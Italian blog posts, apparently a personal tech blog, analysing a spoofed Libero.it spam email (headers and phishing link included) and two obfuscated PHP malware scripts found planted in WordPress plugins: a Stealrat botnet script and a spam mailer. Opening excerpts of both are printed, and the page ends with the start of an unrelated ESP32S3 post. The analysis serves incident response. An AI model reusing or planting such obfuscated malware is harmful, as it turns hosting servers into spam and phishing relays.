Visualizzazione post con etichetta Spam. Mostra tutti i post
Visualizzazione post con etichetta Spam. Mostra tutti i post

martedì 9 dicembre 2014

Spam da Libero.it

Frugando nella cartella spam di GMail (non lo faccio spesso ma ogni tanto controllo di non aver perso qualcosa) ho trovato una mail di mia zia ....curioso che GMail sbagli cosi' a classificare le mail.

Aprendo la mail ho trovato solo un link (http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnpilaulwse=
hm) il quale una volta cliccato rimandava a questo sito (http://mother-blog-home.com/)...ovviamente queste cose si fanno su macchine virtuali usa e getta...mia zia non puo' mandare queste mail ;>
(peraltro la prima volta che ho contattato il sito questo non era raggiungibile, il giorno successivo era invece presente)

ok guardiamo meglio
aprendo gli header del messaggio e' chiaro perche' Google lo ha messo in spam ..l'ip dichiarato dal mittente non corrisponde al server di posta di libero.it

andiamo avanti
il server di posta mittente (cne.gob.ve) e' relativo ad un sito istituzionale venezuelano per le elezioni elettorali (non libero) 
Il messaggio e' stato inoltrato da un client Microsoft ( questo non e' discriminante perche' da Libero si puo' scrivere sia webmail che tramite client di posta sul proprio Pc)

Contattata mia zia mi ha detto che il suo account era stato usato per inviare mail a tutti i suoi contatti 
Il problema era quindi nel portatile ??? Sembra di no perche' non si spiegherebbe l'utilizzo di un mail server venezuelano

Andando un po' a giro (per esempio qui) sembra che il problema sia una compromissione dei server di Libero.it...cambiare password dell'account sembra sostanzialmente inutile, forse e' meglio cambiare servizio di posta


----------------------------------------------------------------------------------                                                                                                                                                                                                                                                                
Delivered-To: xxxxxx@gmail.com
Received: by 10.216.40.6 with SMTP id e6csp81601web;
        Sat, 29 Nov 2014 14:40:43 -0800 (PST)
X-Received: by 10.42.4.201 with SMTP id 9mr1318337ict.23.1417300842579;
        Sat, 29 Nov 2014 14:40:42 -0800 (PST)
Return-Path: <xxxxxxxx@libero.it>
Received: from mail.cne.gob.ve (mail.cne.gob.ve. [190.202.82.22])
        by mx.google.com with SMTP id 9si9731310ica.66.2014.11.29.14.40.41
        for <xxxxxxxx@gmail.com>;
        Sat, 29 Nov 2014 14:40:42 -0800 (PST)
Received-SPF: fail (google.com: domain of xxxxxxx@libero.it does not designate 190.202.82.22 as permitted sender) client-ip=190.202.82.22;
Authentication-Results: mx.google.com;
       spf=fail (google.com: domain of xxxxxxxx@libero.it does not designate 190.202.82.22 as permitted sender) smtp.mail=xxxxxxx@libero.it
Received: from localhost (correo-2 [127.0.0.1])
by mail.cne.gob.ve (Postfix) with ESMTP id 681C74BED69
for <xxxxxxx@gmail.com>; Sat, 29 Nov 2014 22:34:42 +0000 (UTC)
X-Virus-Scanned: amavisd-new at cne.gob.ve
Received: from mail.cne.gob.ve ([127.0.0.1])
by localhost (correo-2.cne [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id PEa1gr_ZJWyY for <xxxxxxxxx@gmail.com>;
Sat, 29 Nov 2014 18:04:41 -0430 (VET)
Received: from mail.cne.gob.ve (67-32-134-95.pool.ukrtel.net [95.134.32.67])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by mail.cne.gob.ve (Postfix) with ESMTPSA id 1E4DE4BED3E
for <xxxxxxx@gmail.com>; Sat, 29 Nov 2014 18:04:39 -0430 (VET)
Authentication-Results: mail.cne.gob.ve; dkim=none reason="no signature";
dkim-adsp=none
Message-ID: <A4D9D0CA95F0A58CD5E10C49A47C1750@mail.cne.gob.ve>
From: "xxxxxxxx" <xxxxxxx@libero.it>
To: "xxxxxx" <xxxxxxx@gmail.com>
Subject: =?ISO-8859-1?Q?FW=3Amwmachado?=
Date: Fri, 29 Nov 2014 11:34:39 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_AFA7_0F92A445.54BC485A"
X-Priority: 3
X-MSMail-Priority: Normal
Importance: Normal
X-Mailer: Microsoft Windows Live Mail 16.4.3522.110
X-MIMEOLE: Produced By Microsoft MimeOLE V16.4.3522.110

This is a multi-part message in MIME format.

------=_NextPart_000_AFA7_0F92A445.54BC485A
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnpilaulwse=
hm 

 xxxxxxx@libero.it 


------=_NextPart_000_AFA7_0F92A445.54BC485A
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

=EF=BB=BF<HTML><HEAD><META http-equiv=3D"content-type" content: text/html;=
 charset=3DUTF-8></HEAD><BODY><a href=
=3D"http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnpilau=
lwsehm">http://expressbookng.com/oikmco/oyurogwunaehhaadlwohrwyurbap.pvtqyqdnp=
ilaulwsehm</a>=
 <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>=
 xxxxxxxx@libero.it <br><br> </BODY></HTML>

------=_NextPart_000_AFA7_0F92A445.54BC485A--

mercoledì 17 settembre 2014

Stealrat BotNet in Php su Wordpress

Sulla stessa macchina in cui era presente quanto descritto a questo post al momento di avviare apache venivano segnalati anche questi errori

Tue Sep 16 16:25:18 2014] [error] [client xxx.xxx.xxx.xxx] PHP Warning:  file_exists(): open_basedir restriction in effect. File(/var/www/vhosts/xxxxxxxx/httpdocs/wp-content/wptouch-data/themes/configOzP.php/readme.txt) is not within the allowed path(s): (/var/www/vhosts/xxxxxxxxxx/httpdocs/:/tmp/) in /var/www/vhosts/xxxxxxxxxxxxx/wp-content/plugins/wptouch-pro-3/core/class-wptouch-pro.php on line 1209

(Sono state omesse le informazioni sensibili)

andando a dare un'occhiata al plugin wptouch nel file indicato si trova il codice sottoriportato (riporto al solito le prime righe per evitare usi illeciti)
Anche in questo caso ci si trova davanti a codice Php offuscato e si alza la soglia di attenzione
--------------------------------------
<?php
@error_reporting(0); 
@ini_set(chr(101).chr(114).'ror_log',NULL); 
@ini_set('log_errors',0); 
if (count($_POST) < 2) 

die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); 

$v5031e998 = false; 
foreach (array_keys($_POST) as $v3c6e0b8a) 
{ switch ($v3c6e0b8a[0]) 
{ case chr(108): 
$vd56b6998 = $v3c6e0b8a; break; 
case chr(100): $v8d777f38 = $v3c6e0b8a; break; 
case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; 
case chr(101); $v5031e998 = true; 
break; 


if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); 
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); 
$v01b6e203 = @$_POST[$vd56b6998]; 
$v8d777f38 = @$_POST[$v8d777f38]; 
$v3d26b0b1 = @$_POST[$v3d26b0b1]; 
if ($v5031e998) 
{ $v01b6e203 = n9a2d8ce3($v01b6e203); 
 $v8d777f38 = n9a2d8ce3($v8d777f38); 
 $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); 

$v01b6e203 = urldecode(stripslashes($v01b6e203)); 
$v8d777f38 = urldecode(stripslashes($v8d777f38)); 
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); 
if (strpos($v01b6e203, '#',1) != false) 

$v16a9b63f = preg_split('/#/', $v01b6e203); 
$ve2942a04 = count($v16a9b63f); 
} else { 
$v16a9b63f[0] = $v01b6e203; 
$ve2942a04 = 1; 
--------------------------------------

in questo caso la ricerca su Internet riporta molti riferimenti con addirittura una sorta di manuale di istruzione pubblicato da TrendMicro. Si tratta di uno script da BotNet denominato Stealrat nato per fare sostanzialmente spamming e pishing

Spam robot in Php su Wordpress

Ieri un amico mi ha chiamato perche' il suo server web era giu' senza un motivo evidente. Si tratta di una installazione non proprio banale di wordpress (con un po' di plugin attivi)

Guardando access_log le ultime 350 righe riportavano il seguente codice
[16/Sep/2014:14:40:15 +0200] "POST /wp-content/plugins/ubermenu/standard/timthumb/stats.php HTTP/1.1" 200 522 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

l'attenzione si e' quindi focalizzata sul file stats.php del plugin ubermenu.Fra le altre cose nel codice di UberMenu (scaricato dal sito ufficiale) non e' presente nessun file stat.php nella sottodirectory timthumb

Riporto di seguito le prime righe (in modo da non diffondere il codice completo)
E' evidente anche all'occhio piu' inesperto l'offuscamento del codice Php realizzato popolando un arrary ($i59) con un serie di caratteri e componendo in seguito i comandi usando la concatenazione di caratteri da questo array. Alcune di queste variabili $GLOBALS definiscono nomi di funzioni mentre in altri casi compongono i parametri da passare alle funzioni

------------------------------------------------------
<?
$i59="Euc<v#`5R1s?j{\nJnd8,KA>}wIQ\r7gp;^U0\"YBSH@!=&MOG\\Vlaz\$2mtxLFDX[Zb:f6)~h+%'_k/iyN4CTer.|(3]-\tq9*o PW"; 
$GLOBALS['kyvlc2'] = $i59[82].$i59[83].$i59[83].$i59[94].$i59[83].$i59[73].$i59[83].$i59[82].$i59[30].$i59[94].$i59[83].$i59[55].$i59[76].$i59[16].$i59[29]; 
$GLOBALS['osuwk64'] = $i59[76].$i59[16].$i59[76].$i59[73].$i59[10].$i59[82].$i59[55]; 
$GLOBALS['mrkzp11'] = $i59[63].$i59[2].$i59[55].$i59[76].$i59[94].$i59[53].$i59[28]; 
$GLOBALS['olhjz88'] = $i59[54].$i59[17].$i59[7]; 
$GLOBALS['gtwpr99'] = $i59[56].$i59[50].$i59[29].$i59[24].$i59[91].$i59[9].$i59[92]; 
$GLOBALS['azxqi23'] = $i59[65].$i59[10].$i59[1].$i59[56].$i59[1].$i59[9].$i59[53]; 
$GLOBALS['ttins71'] = $i59[10].$i59[49].$i59[49].$i59[55].$i59[24].$i59[9].$i59[28]; 
$GLOBALS['biplj38'] = $i59[69].$i59[74].$i59[63].$i59[49].$i59[91].$i59[18].$i59[18]; 
$GLOBALS['fufff37'] = $i59[2].$i59[83].$i59[16].$i59[54].$i59[10].$i59[79].$i59[34]; 
$GLOBALS['llsic87'] = $i59[30].$i59[74].$i59[24].$i59[56].$i59[29].$i59[53].$i59[53]; 
$GLOBALS['npqfu35'] = $i59[29].$i59[49].$i59[56].$i59[82].$i59[56].$i59[92].$i59[53]; 
$GLOBALS['kgedf91'] = $i59[77].$i59[29].$i59[56].$i59[55].$i59[65].$i59[7].$i59[53]; 
$GLOBALS['tscso85'] = $i59[10].$i59[55].$i59[83].$i59[49].$i59[82].$i59[16]; //1ayOin
$GLOBALS['dkzox36'] = $i59[2].$i59[69].$i59[83]; //uby
$GLOBALS['nqkyz54'] = $i59[94].$i5mrkzp119[83].$i59[17]; //]yj
$GLOBALS['bbolh46'] = $i59[63].$i59[50].$i59[10].$i59[82].$i59[66].$i59[79].$i59[73].$i59[82].$i59[16].$i59[2].$i59[94].$i59[17].$i59[82]; 
$GLOBALS['pzfzn51'] = $i59[2].$i59[94].$i59[1].$i59[16].$i59[55]; 
$GLOBALS['goxku40'] = $i59[65].$i59[1].$i59[16].$i59[2].$i59[55].$i59[76].$i59[94].$i59[16].$i59[73].$i59[82].$i59[56].$i59[76].$i59[10].$i59[55].$i59[10]; 
$GLOBALS['qllnp80'] = $i59[54].$i59[50].$i59[76].$i59[49]; 
$GLOBALS['oewlq88'] = $i59[65].$i59[12].$i59[2].$i59[24].$i59[17].$i59[92]; 
$GLOBALS['inaco6'] = $i59[65].$i59[29].$i59[82].$i59[55].$i59[10]; 
$GLOBALS['fbigd92'] = $i59[29].$i59[82].$i59[55].$i59[69].$i59[94].$i59[10].$i59[55].$i59[63].$i59[77].$i59[16].$i59[50].$i59[54].$i59[82]; 
$GLOBALS['szwwc12'] = $i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16]; 
$GLOBALS['ifjvc34'] = $i59[30].$i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16]; 
$GLOBALS['eypvx47'] = $i59[10].$i59[55].$i59[83].$i59[82].$i59[50].$i59[54].$i59[73].$i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[49].$i59[76].$i59[82].$i59[16].$i59[55]; 
$GLOBALS['ewgqn30'] = $i59[65].$i59[30].$i59[1].$i59[55].$i59[10]; 
$GLOBALS['qlkol47'] = $i59[55].$i59[83].$i59[76].$i59[54]; 
$GLOBALS['wwxez32'] = $i59[30].$i59[83].$i59[82].$i59[29].$i59[73].$i59[83].$i59[82].$i59[30].$i59[49].$i59[50].$i59[2].$i59[82]; 
$GLOBALS['xumld93'] = $i59[65].$i59[2].$i59[49].$i59[94].$i59[10].$i59[82]; 
$GLOBALS['sfroq33'] = $i59[24].$i59[65].$i59[77].$i59[65].$i59[51].$i59[18].$i59[53]; 
$GLOBALS['snkbr7'] = $i59[55].$i59[76].$i59[54].$i59[82]; 
$GLOBALS['gbiun57'] = $i59[24].$i59[17].$i59[74].$i59[50].$i59[77].$i59[28]; 
$GLOBALS['vfpnn60'] = $i59[50].$i59[83].$i59[83].$i59[50].$i59[77].$i59[73].$i59[10].$i59[82].$i59[50].$i59[83].$i59[2].$i59[69]; 
$GLOBALS['slvul93'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[49].$i59[94].$i59[10].$i59[82]; 
$GLOBALS['abwqf91'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[83].$i59[82].$i59[50].$i59[55].$i59[82]; 
$GLOBALS['wjevo71'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[10].$i59[82].$i59[55].$i59[73].$i59[16].$i59[94].$i59[16].$i59[63].$i59[49].$i59[94].$i59[2].$i59[74]; 
$GLOBALS['zqewi88'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[94].$i59[16].$i59[16].$i59[82].$i59[2].$i59[55]; 
$GLOBALS['syafl23'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[49].$i59[50].$i59[10].$i59[55].$i59[73].$i59[82].$i59[83].$i59[83].$i59[94].$i59[83]; 
$GLOBALS['mhzfy25'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[10].$i59[82].$i59[49].$i59[82].$i59[2].$i59[55]; 
$GLOBALS['rmuvr11'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[83].$i59[82].$i59[50].$i59[17]; 
$GLOBALS['tgaup44'] = $i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[24].$i59[83].$i59[76].$i59[55].$i59[82]; 
$GLOBALS['qihri77'] = $i59[2].$i59[49].$i59[94].$i59[10].$i59[82].$i59[38].$i59[94].$i59[2].$i59[74]; 
$GLOBALS['bavbu3'] = $i59[17].$i59[50].$i59[55].$i59[82]; 
$GLOBALS['vgyag20'] = $i59[10].$i59[55].$i59[83].$i59[73].$i59[83].$i59[82].$i59[30].$i59[49].$i59[50].$i59[2].$i59[82]; 
$GLOBALS['rssnp53'] = $i59[30].$i59[83].$i59[82].$i59[29].$i59[73].$i59[54].$i59[50].$i59[55].$i59[2].$i59[69]; 
$GLOBALS['bosbj25'] = $i59[1].$i59[2].$i59[65].$i59[76].$i59[83].$i59[10].$i59[55]; 
$GLOBALS['eebyx59'] = $i59[76].$i59[16].$i59[76].$i59[73].$i59[29].$i59[82].$i59[55]; 
$GLOBALS['ltkgi30'] = $i59[29].$i59[82].$i59[55].$i59[54].$i59[56].$i59[83].$i59[83]; 
$GLOBALS['veudg88'] = $i59[50].$i59[83].$i59[83].$i59[50].$i59[77].$i59[73].$i59[74].$i59[82].$i59[77].$i59[10]; 
$GLOBALS['ugeiv74'] = $i59[54].$i59[76].$i59[16]; 
$GLOBALS['vkxhv92'] = ${$i59[73].$i59[96].$i59[45].$i59[38].$i59[81]}; 
$GLOBALS['gpcou63'] = $i59[30].$i59[30].$i59[1].$i59[91].$i59[17].$i59[28].$i59[66]; 
$GLOBALS['kkndw71'] = $i59[30].$i59[83].$i59[82].$i59[29].$i59[73].$i59[10].$i59[30].$i59[49].$i59[76].$i59[55]; 
$GLOBALS['knpxe74'] = $i59[63].$i59[50].$i59[10].$i59[82].$i59[66].$i59[79].$i59[73].$i59[17].$i59[82].$i59[2].$i59[94].$i59[17].$i59[82]; 
$GLOBALS['ywanc2'] = $i59[1].$i59[83].$i59[49].$i59[17].$i59[82].$i59[2].$i59[94].$i59[17].$i59[82]; 
$GLOBALS['ggbdg61'] = $i59[10].$i59[55].$i59[83].$i59[76].$i59[30].$i59[10].$i59[49].$i59[50].$i59[10].$i59[69].$i59[82].$i59[10];
@$GLOBALS['kyvlc2'](NULL);
@$GLOBALS['osuwk64']($i59[82].$i59[83].$i59[83].$i59[94].$i59[83].$i59[73].$i59[49].$i59[94].$i59[29],NULL);
@$GLOBALS['osuwk64']($i59[49].$i59[94].$i59[29].$i59[73].$i59[82].$i59[83].$i59[83].$i59[94].$i59[83].$i59[10],0);
$vxlcl82 = 
array( $i59[17].$i59[50].$i59[55].$i59[50].$i59[81].$i59[94] => "",
   $i59[65].$i59[83].$i59[94].$i59[54].$i59[57].$i59[94].$i59[29].$i59[76].$i59[16] => "",
   $i59[65].$i59[83].$i59[94].$i59[54].$i59[78].$i59[50].$i59[54].$i59[82] => "",
   $i59[10].$i59[1].$i59[63].$i59[12].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49] => "",
   $i59[63].$i59[94].$i59[17].$i59[77].$i59[81].$i59[82].$i59[54].$i59[30].$i59[49] => "",
   $i59[69].$i59[94].$i59[10].$i59[55].$i59[58].$i59[83].$i59[94].$i59[54] => "",
   $i59[76].$i59[16].$i59[76].$i59[55].$i59[16].$i59[63].$i59[10].$i59[94].$i59[2].$i59[74] => FALSE,
   $i59[76].$i59[16].$i59[76].$i59[55].$i59[10].$i59[94].$i59[2].$i59[74] => FALSE,
   $i59[76].$i59[16].$i59[76].$i59[55].$i59[54].$i59[50].$i59[76].$i59[49] => FALSE,);

if (FALSE == $GLOBALS['mrkzp11']($i59, $vxlcl82)) 
{
echo PHP_OS.$i59[70].$GLOBALS['olhjz88'](0987654321).$i59[70].$i59[34].$i59[9].$i59[70].$i59[61].$i59[61].$i59[88].$i59[88].$i59[14];
exit;
}
$unahu45 = array();

-------------------------------------------------------------------------------------
Cercando su internet non si trovano molte informazioni a riguardo (a parte questo link  link disattivato) ma con un po' piu di attenzione si arriva ad una pagina di PasteBin (che non linko) che riporta il codice non offuscato
Si tratta di mail script in Php di circa 500 righe.
Per esempio riporto solo la definizione di un array
------------------------------------
$vxlcl82 = array(
    "dataTo" => "",
    "fromLogin" => "",
    "fromName" => "",
    "subjTempl" => "",
    "bodyTempl" => "",
    "hostFrom" => "",
    "initnbsock" => FALSE,
    "initsock" => FALSE,
    "initmail" => FALSE
);
------------------------------------

 La macchina era quindi impegnata a fare spam e metteva in crisi le poche risorse disponibili

Debugger integrato ESP32S3

Aggiornamento In realta' il Jtag USB funziona anche sui moduli cinesi Il problema risiede  nell'ID USB della porta Jtag. Nel modulo...